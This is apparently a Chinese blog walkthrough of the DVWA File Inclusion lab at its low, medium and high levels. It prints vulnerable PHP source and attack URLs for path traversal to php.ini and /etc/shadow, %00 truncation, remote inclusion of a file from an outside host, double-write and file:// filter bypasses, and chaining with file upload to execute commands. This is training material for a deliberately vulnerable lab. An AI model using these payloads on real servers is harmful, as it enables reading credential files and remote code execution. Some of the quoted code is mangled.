0x01了解什么叫file inclusion
File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。
0x02low级别的
首先我们来观察一下源码
<?php // The page we wish to display $file = $_GET[ 'page' ]; // Only allow include.php or file{1..3}.php if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { // This isn't the page we want! echo "ERROR: File not found!"; exit; } ?>
这里从源码我们可以得知 服务器端未对page参数进行任何过滤和检查
服务器期望用户的操作是点击下面的三个链接,服务器会包含相应的文件,并将结果返回。需要特别说明的是,服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确为php,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。
我们来点击一下链接看一下是什么
正常的执行 ,然而我们的目的是让他不正常的执行从而获得我们想要的东西 page参数可以被我们定义
接下里我们利用服务器端未对page参数进行过滤从而构造url 执行我们的命令
因为不知道服务器端是什么类型的
1先尝试一下
http://127.0.0.1/dwva/vulnerabilities/fi/?page=etc/shadow
没有文件证明不是liunx操作系统的 同时还暴露了文件的绝对路径
这时候我们可以看一下php.ini里面的配置文件是否打开了远程文件包含的漏洞
http://127.0.0.1/dwva/vulnerabilities/fi/?page=C:phpStudy1PHPTutorialWWWdwvaphp.ini
构造url 相对路径
http://127.0.0.1/dwva/vulnerabilities/fi/?page=..................phpStudy1PHPTutorialWWWdwvaphp.ini
读取成功 加这么多..是为了保证到达服务器的C盘根目录,可以看到读取是成功的。
同时我们看到,配置文件中的Magic_quote_gpc选项为off。在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,我们可以在文件名中使用%00进行截断,也就是说文件名中%00后的内容不会被识别,即下面两个url是完全等效的。
Ahttp://127.0.0.1/dwva/vulnerabilities/fi/?page=..................phpStudy1PHPTutorialWWWdwvaphp.ini%0012da5163.php
Bhttp://127.0.0.1/dwva/vulnerabilities/fi/?page=..................phpStudy1PHPTutorialWWWdwvaphp.ini
可惜的是由于本次实验环境的php版本为5.4.45,所以无法进行验证。
使用%00截断可以绕过某些过滤规则,例如要求page参数的后缀必须为php,这时链接A会读取失败,而链接B可以绕过规则成功读取。
说实话 小编挺难受的 2.00--4.00弄了两个小时才发现我的远程包含没配置好 我的天
那我们就讲讲思路吧 远程服务器上面 放一个你要执行的文件 然后构造url让服务器去访问
http://127.0.0.1/dwva/vulnerabilities/fi/?page=http://192.168.1.102/test.txt
让本地服务器把这个当成一个文件去包含他 然后成功执行
当然我们如果绝的那样太明显的话 我们可以进行编码
http://192.168.153.130/dvwa/vulnerabilities/fi/page=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%35%2e%31%32%2f%70%68%70%69%6e%66%6f%2e%74%78%74
同样可以执行成功
0X03Medium
源代码 过滤了http://","https://../","..""然后把这些替换为空
<php //Thepagewewishtodisplay $file=$_GET['page']; //Inputvalidation $file=str_replace(array("http://","https://"),"",$file); $file=str_replace(array("../","..""),"",$file); >
我们可以双写绕过
可以看到,Medium级别的代码增加了str_replace函数,对page参数进行了一定的处理,将”http:// ”、”https://”、 ” ../”、”..”替换为空字符,即删除。
漏洞利用
使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。
例如page=hthttp://tp://127.0.0.1/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://127.0.0.1/phpinfo.txt,成功执行远程命令。
同时,因为替换的只是“../”、“..”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
1.本地文件包含 不影响
但是这里
http://192.168.153.130/dvwa/vulnerabilities/fi/page=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%35%2e%31%32%2f%70%68%70%69%6e%66%6f%2e%74%78%74 经过编码后的url不能绕过替换规则,因为解码是在浏览器端完成的,发送过去的page参数依然是http://192.168.5.12/phpinfo.txt,因此读取失败。
0x04High
服务器端核心代码
<php //Thepagewewishtodisplay $file=$_GET['page']; //Inputvalidation if(!fnmatch("file*",$file)&&$file!="include.php"){ //Thisisn'tthepagewewant! echo"ERROR:Filenotfound!"; exit; } >
f(!fnmatch("file*",$file)&&$file!="include.php"),当文件既不是"include.php"也不是"file*"(文件名file开头)时才抛出错误,反之意思即,如果文件名符合其中一个条件既可以。page=file:///C:/xampp/htdocs/dvwa/php.ini 刚好满足"file*"(文件名file开头)
可以看到,High级别的代码使用了fnmatch函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件。
漏洞利用
High级别的代码规定只能包含file开头的文件,看似安全,不幸的是我们依然可以利用file协议绕过防护策略。file协议其实我们并不陌生,当我们用浏览器打开一个本地文件时,用的就是file协议,如下图。
那我们利用这个特性进行绕过
至于执行任意命令,需要配合文件上传漏洞利用。首先需要上传一个内容为php的文件,然后再利用file协议去包含上传文件(需要知道上传文件的绝对路径),从而实现任意命令执行